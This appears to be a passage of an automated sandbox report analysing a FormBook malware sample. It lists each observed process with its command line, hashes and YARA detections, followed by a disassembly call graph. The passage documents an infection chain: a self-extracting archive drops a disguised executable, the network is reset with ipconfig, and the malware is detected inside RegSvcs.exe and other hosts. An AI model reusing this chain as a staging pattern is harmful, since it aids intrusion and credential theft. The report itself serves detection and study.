                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:7
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:dmqiuorkt.mp2 tdggoffi.bin
                                                                                                                                                                          Imagebase:0x850000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:8
                                                                                                                                                                          Start time:13:02:11
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:ipconfig /release
                                                                                                                                                                          Imagebase:0x620000
                                                                                                                                                                          File size:29'184 bytes
                                                                                                                                                                          MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:10
                                                                                                                                                                          Start time:13:02:14
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:11
                                                                                                                                                                          Start time:13:02:14
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                          Imagebase:0x7ff70f010000
                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:12
                                                                                                                                                                          Start time:13:02:14
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:ipconfig /renew
                                                                                                                                                                          Imagebase:0x620000
                                                                                                                                                                          File size:29'184 bytes
                                                                                                                                                                          MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:13
                                                                                                                                                                          Start time:13:02:21
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x320000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:14
                                                                                                                                                                          Start time:13:02:21
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0xf60000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:13:02:29
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:16
                                                                                                                                                                          Start time:13:02:38
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x720000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:17
                                                                                                                                                                          Start time:13:02:38
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x8d0000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:18
                                                                                                                                                                          Start time:13:02:44
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:21
                                                                                                                                                                          Start time:13:02:55
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin
                                                                                                                                                                          Imagebase:0x330000
                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                          MD5 hash:0ADB9B817F1DF7807576C2D7068DD931
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:13:03:17
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\UserAccountControlSettings.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\UserAccountControlSettings.exe"
                                                                                                                                                                          Imagebase:0x1c0000
                                                                                                                                                                          File size:89'600 bytes
                                                                                                                                                                          MD5 hash:5AEA4CD2B6CA1E44E27D1A95917FEE60
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Yara matches:
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:23
                                                                                                                                                                          Start time:13:03:21
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x130000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:24
                                                                                                                                                                          Start time:13:03:22
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x850000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:25
                                                                                                                                                                          Start time:13:03:24
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x2a0000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:26
                                                                                                                                                                          Start time:13:03:24
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                                                                                          Imagebase:0x40000
                                                                                                                                                                          File size:45'984 bytes
                                                                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:29
                                                                                                                                                                          Start time:13:03:25
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196
                                                                                                                                                                          Imagebase:0xfc0000
                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          General

                                                                                                                                                                          Target ID:32
                                                                                                                                                                          Start time:13:05:49
                                                                                                                                                                          Start date:05/12/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                          Imagebase:0x7ff633410000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Disassembly

                                                                                                                                                                          Reset < >

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:9.5%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:11.2%
                                                                                                                                                                            Total number of Nodes:1868
                                                                                                                                                                            Total number of Limit Nodes:31
                                                                                                                                                                            execution_graph 28050 250b05 28051 250b17 __cftof 28050->28051 28054 2576e5 28051->28054 28057 2576a7 GetCurrentProcess GetProcessAffinityMask 28054->28057 28058 250b6f 28057->28058 28059 264a07 28060 264910 28059->28060 28062 264fce 28060->28062 28088 264d2c 28062->28088 28064 264fde 28065 26503b 28064->28065 28070 26505f 28064->28070 28066 264f6c DloadReleaseSectionWriteAccess 8 API calls 28065->28066 28067 265046 RaiseException 28066->28067 28068 265234 28067->28068 28068->28060 28069 2650d7 LoadLibraryExA 28071 2650ea GetLastError 28069->28071 28072 265138 28069->28072 28070->28069 28070->28072 28075 26514a 28070->28075 28084 265206 28070->28084 28073 265113 28071->28073 28074 2650fd 28071->28074 28072->28075 28077 265143 FreeLibrary 28072->28077 28078 264f6c DloadReleaseSectionWriteAccess 8 API calls 28073->28078 28074->28072 28074->28073 28076 2651a8 GetProcAddress 28075->28076 28075->28084 28079 2651b8 GetLastError 28076->28079 28076->28084 28077->28075 28081 26511e RaiseException 28078->28081 28082 2651cb 28079->28082 28081->28068 28083 264f6c DloadReleaseSectionWriteAccess 8 API calls 28082->28083 28082->28084 28085 2651ec RaiseException 28083->28085 28099 264f6c 28084->28099 28086 264d2c ___delayLoadHelper2@8 8 API calls 28085->28086 28087 265203 28086->28087 28087->28084 28089 264d5e 28088->28089 28090 264d38 28088->28090 28089->28064 28107 264dd5 28090->28107 28092 264d3d 28093 264d59 28092->28093 28112 264efe 28092->28112 28117 264d5f GetModuleHandleW GetProcAddress GetProcAddress 28093->28117 28096 264fa7 28097 264fc3 28096->28097 28098 264fbf RtlReleaseSRWLockExclusive 28096->28098 28097->28064 28098->28064 28100 264fa0 28099->28100 28101 264f7e 28099->28101 28100->28068 28102 264dd5 DloadReleaseSectionWriteAccess 4 API calls 28101->28102 28103 264f83 28102->28103 28104 264f9b 28103->28104 28106 264efe DloadProtectSection 3 API calls 28103->28106 28120 264fa2 GetModuleHandleW GetProcAddress GetProcAddress RtlReleaseSRWLockExclusive DloadReleaseSectionWriteAccess 28104->28120 28106->28104 28118 264d5f GetModuleHandleW GetProcAddress GetProcAddress 28107->28118 28109 264dda 28110 264df2 RtlAcquireSRWLockExclusive 28109->28110 28111 264df6 28109->28111 28110->28092 28111->28092 28113 264f13 DloadProtectSection 28112->28113 28114 264f4e VirtualProtect 28113->28114 28115 264f19 28113->28115 28119 264e14 VirtualQuery GetSystemInfo 28113->28119 28114->28115 28115->28093 28117->28096 28118->28109 28119->28114 28120->28100 28121 241125 28126 2476e7 28121->28126 28123 24112a 28134 266029 29 API calls 28123->28134 28125 241134 28127 2476f3 __EH_prolog3 28126->28127 28135 250aaf GetCurrentProcess GetProcessAffinityMask 28127->28135 28129 2476fd 28136 254f2b 28 API calls __EH_prolog3 28129->28136 28131 247874 28137 247cba GetCurrentProcess GetProcessAffinityMask 28131->28137 28133 247891 28133->28123 28134->28125 28135->28129 28136->28131 28137->28133 28138 26f124 28149 2727e0 28138->28149 28143 26f141 28145 2703d4 _free 20 API calls 28143->28145 28146 26f176 28145->28146 28147 26f14c 28166 2703d4 28147->28166 28150 26f136 28149->28150 28151 2727e9 28149->28151 28153 272be0 GetEnvironmentStringsW 28150->28153 28172 2726d7 51 API calls 4 library calls 28151->28172 28154 272c4a 28153->28154 28155 272bf7 28153->28155 28157 272c53 FreeEnvironmentStringsW 28154->28157 28158 26f13b 28154->28158 28156 272bfd WideCharToMultiByte 28155->28156 28156->28154 28159 272c19 28156->28159 28157->28158 28158->28143 28165 26f17c 26 API calls 4 library calls 28158->28165 28173 27040e 21 API calls 2 library calls 28159->28173 28161 272c1f 28162 272c26 WideCharToMultiByte 28161->28162 28163 272c3c 28161->28163 28162->28163 28164 2703d4 _free 20 API calls 28163->28164 28164->28154 28165->28147 28167 2703df RtlFreeHeap 28166->28167 28168 270408 _free 28166->28168 28167->28168 28169 2703f4 28167->28169 28168->28143 28174 2701d3 20 API calls _abort 28169->28174 28171 2703fa GetLastError 28171->28168 28172->28150 28173->28161 28174->28171 28175 264d22 28176 264ce9 28175->28176 28176->28175 28177 264fce ___delayLoadHelper2@8 17 API calls 28176->28177 28177->28176 28178 265680 28179 265696 _com_error::_com_error 28178->28179 28184 26734a 28179->28184 28181 2656a4 28182 264fce ___delayLoadHelper2@8 17 API calls 28181->28182 28183 2656bc 28182->28183 28185 267391 RaiseException 28184->28185 28186 267364 28184->28186 28185->28181 28186->28185 28187 260900 28188 26090f __EH_prolog3_catch_GS 28187->28188 28429 241e44 28188->28429 28191 260940 28195 260a20 28191->28195 28196 260951 28191->28196 28229 26095f 28191->28229 28192 26125b 28553 263796 28192->28553 28199 260ab0 28195->28199 28202 260a36 28195->28202 28200 2609fc 28196->28200 28201 26095a 28196->28201 28439 241ce2 28199->28439 28206 260a15 EndDialog 28200->28206 28200->28229 28208 254318 53 API calls 28201->28208 28201->28229 28207 254318 53 API calls 28202->28207 28204 2612a3 GetDlgItem 28213 2612c4 28204->28213 28205 261293 SendDlgItemMessageW 28205->28204 28206->28229 28210 260a53 SetDlgItemTextW 28207->28210 28211 26098d 28208->28211 28216 260a5f 28210->28216 28606 241900 29 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28211->28606 28212 260acb EndDialog 28352 260ae4 28212->28352 28571 251309 28213->28571 28215 260b01 GetDlgItem 28226 260b15 28215->28226 28222 260a68 GetMessageW 28216->28222 28216->28229 28219 2612e3 GetDlgItem 28221 261302 28219->28221 28220 260994 28223 2609a4 28220->28223 28607 241de7 28220->28607 28580 241e05 28221->28580 28225 260a7f IsDialogMessageW 28222->28225 28222->28229 28223->28229 28610 2419a9 26 API calls 28223->28610 28225->28216 28232 260a8e TranslateMessage DispatchMessageW 28225->28232 28233 260b6f 28226->28233 28234 260b48 28226->28234 28227 26113a 28235 254318 53 API calls 28227->28235 28611 265796 28229->28611 28230 241a66 26 API calls 28230->28229 28231 26130c 28583 25f2ce GetClassNameW 28231->28583 28232->28216 28626 247673 28233->28626 28239 254318 53 API calls 28234->28239 28240 26114b SetDlgItemTextW 28235->28240 28243 260b52 28239->28243 28244 261160 28240->28244 28614 2414a7 28243->28614 28249 254318 53 API calls 28244->28249 28252 26117e 28249->28252 28250 260b88 28256 254318 53 API calls 28250->28256 28255 2414a7 28 API calls 28252->28255 28254 260b6a 28453 241a66 28254->28453 28258 261187 28255->28258 28259 260b9f 28256->28259 28257 261346 28261 261377 28257->28261 28262 254318 53 API calls 28257->28262 28264 2611f5 28258->28264 28276 2414a7 28 API calls 28258->28276 28631 256a25 28259->28631 28260 261d4f 48 API calls 28260->28257 28268 261d4f 48 API calls 28261->28268 28365 261490 28261->28365 28266 261359 SetDlgItemTextW 28262->28266 28269 254318 53 API calls 28264->28269 28272 254318 53 API calls 28266->28272 28274 26138d 28268->28274 28275 2611ff 28269->28275 28271 261595 28278 2615a0 EnableWindow 28271->28278 28279 2615ad 28271->28279 28280 26136d SetDlgItemTextW 28272->28280 28273 260be0 28282 260c07 28273->28282 28635 24ed0d 28273->28635 28295 2613ad 28274->28295 28315 2613ce 28274->28315 28283 2414a7 28 API calls 28275->28283 28284 2611a6 28276->28284 28277 263572 12 API calls 28285 260bbb 28277->28285 28278->28279 28305 2615c8 28279->28305 28665 241cc4 GetDlgItem KiUserCallbackDispatcher 28279->28665 28280->28261 28457 24eaf3 28282->28457 28287 26120b 28283->28287 28288 254318 53 API calls 28284->28288 28286 241a66 26 API calls 28285->28286 28286->28254 28303 2414a7 28 API calls 28287->28303 28313 2611b6 28288->28313 28289 26147c 28296 261d4f 48 API calls 28289->28296 28293 261560 28664 25e265 34 API calls __EH_prolog3_GS 28293->28664 28662 25e265 34 API calls __EH_prolog3_GS 28295->28662 28296->28365 28297 2615bf 28666 241cc4 GetDlgItem KiUserCallbackDispatcher 28297->28666 28300 260c2b 28467 252226 28300->28467 28301 260c20 GetLastError 28301->28300 28310 261224 28303->28310 28307 254318 53 API calls 28305->28307 28305->28352 28306 260c01 28638 25fa79 25 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 28306->28638 28314 261609 SetDlgItemTextW 28307->28314 28322 241a66 26 API calls 28310->28322 28311 2414a7 28 API calls 28311->28365 28330 241a66 26 API calls 28313->28330 28314->28352 28315->28289 28318 261d4f 48 API calls 28315->28318 28316 260c40 28319 260c5d 28316->28319 28320 260c4c GetLastError 28316->28320 28317 261587 28321 241a66 26 API calls 28317->28321 28324 261405 28318->28324 28325 260cfd 28319->28325 28329 260d0f 28319->28329 28332 260c79 GetTickCount 28319->28332 28320->28319 28326 261593 28321->28326 28327 261243 28322->28327 28323 254318 53 API calls 28323->28365 28324->28289 28331 26140e DialogBoxParamW 28324->28331 28328 261046 28325->28328 28325->28329 28326->28271 28334 241a66 26 API calls 28327->28334 28502 241e1f GetDlgItem ShowWindow 28328->28502 28335 260f94 28329->28335 28639 2513f9 28329->28639 28336 2611e9 28330->28336 28331->28289 28337 26142c EndDialog 28331->28337 28470 24325c 28332->28470 28340 26124e 28334->28340 28335->28212 28660 249733 28 API calls _wcslen 28335->28660 28343 241a66 26 API calls 28336->28343 28337->28229 28344 261448 28337->28344 28339 26105b 28503 241e1f GetDlgItem ShowWindow 28339->28503 28347 241a66 26 API calls 28340->28347 28343->28264 28344->28229 28663 2419a9 26 API calls 28344->28663 28347->28352 28348 260fae 28361 254318 53 API calls 28348->28361 28349 260d39 28650 25505a 105 API calls 28349->28650 28351 261064 28504 254318 28351->28504 28352->28230 28355 260c9f 28356 241a66 26 API calls 28355->28356 28359 260cab 28356->28359 28358 260d51 28367 256a25 53 API calls 28358->28367 28480 24de9a 28359->28480 28364 260fd4 28361->28364 28362 241a66 26 API calls 28362->28365 28373 241a66 26 API calls 28364->28373 28365->28271 28365->28293 28365->28311 28365->28323 28365->28362 28366 261082 SetDlgItemTextW GetDlgItem 28369 2610b7 28366->28369 28370 26109f GetWindowLongW SetWindowLongW 28366->28370 28382 260d80 GetCommandLineW 28367->28382 28509 261d4f 28369->28509 28370->28369 28377 260fea 28373->28377 28374 260ce0 28493 24ddc7 28374->28493 28375 260cd5 GetLastError 28375->28374 28380 241a66 26 API calls 28377->28380 28379 261d4f 48 API calls 28384 2610ce 28379->28384 28385 260ff6 28380->28385 28391 260e05 _wcslen 28382->28391 28539 263c78 28384->28539 28394 254318 53 API calls 28385->28394 28387 241a66 26 API calls 28387->28325 28389 260e23 28652 260405 5 API calls 2 library calls 28389->28652 28651 260405 5 API calls 2 library calls 28391->28651 28393 261d4f 48 API calls 28404 2610ef 28393->28404 28396 26100c 28394->28396 28395 260e2f 28653 260405 5 API calls 2 library calls 28395->28653 28399 2414a7 28 API calls 28396->28399 28398 261110 28661 241cc4 GetDlgItem KiUserCallbackDispatcher 28398->28661 28402 261015 28399->28402 28400 260e3b 28654 255109 105 API calls 28400->28654 28409 241a66 26 API calls 28402->28409 28404->28398 28407 261d4f 48 API calls 28404->28407 28405 260af5 28405->28212 28405->28227 28406 260e4e 28655 263e53 28 API calls __EH_prolog3 28406->28655 28407->28398 28411 261031 28409->28411 28410 260e6b CreateFileMappingW 28412 260ed5 ShellExecuteExW 28410->28412 28413 260e9d MapViewOfFile 28410->28413 28414 241a66 26 API calls 28411->28414 28416 260ef3 28412->28416 28415 260ed2 __InternalCxxFrameHandler 28413->28415 28414->28212 28415->28412 28417 260f00 WaitForInputIdle 28416->28417 28418 260f3d 28416->28418 28419 260f1e 28417->28419 28421 260f73 28418->28421 28422 260f60 UnmapViewOfFile CloseHandle 28418->28422 28419->28418 28420 260f23 Sleep 28419->28420 28420->28418 28420->28419 28656 242e8b 28421->28656 28422->28421 28425 241a66 26 API calls 28426 260f83 28425->28426 28427 241a66 26 API calls 28426->28427 28428 260f8e 28427->28428 28428->28335 28430 241ea6 28429->28430 28431 241e4d 28429->28431 28668 253e83 GetWindowLongW SetWindowLongW 28430->28668 28433 241eb3 28431->28433 28667 253eaa 63 API calls 3 library calls 28431->28667 28433->28191 28433->28192 28433->28229 28435 241e6f 28435->28433 28436 241e82 GetDlgItem 28435->28436 28436->28433 28437 241e92 28436->28437 28437->28433 28438 241e98 SetWindowTextW 28437->28438 28438->28433 28669 2657d8 28439->28669 28441 241cee GetDlgItem 28442 241d1d 28441->28442 28443 241d0b 28441->28443 28670 241d64 28442->28670 28444 2414a7 28 API calls 28443->28444 28446 241d18 28444->28446 28447 241a66 26 API calls 28446->28447 28448 241d4d 28446->28448 28447->28448 28449 241d5a 28448->28449 28450 241a66 26 API calls 28448->28450 28681 265787 28449->28681 28450->28449 28454 241a80 28453->28454 28455 241a71 28453->28455 28454->28273 28634 263d64 26 API calls __EH_prolog3_GS 28454->28634 28456 2412a7 26 API calls 28455->28456 28456->28454 28459 24eaff __EH_prolog3_GS 28457->28459 28458 24eb09 28460 265787 5 API calls 28458->28460 28459->28458 28462 24eb84 28459->28462 28466 241a66 26 API calls 28459->28466 28699 24769f 28459->28699 28706 24efef 28459->28706 28461 24ebb6 28460->28461 28461->28300 28461->28301 28462->28458 28463 24efef 54 API calls 28462->28463 28463->28458 28466->28459 28468 252230 28467->28468 28469 252232 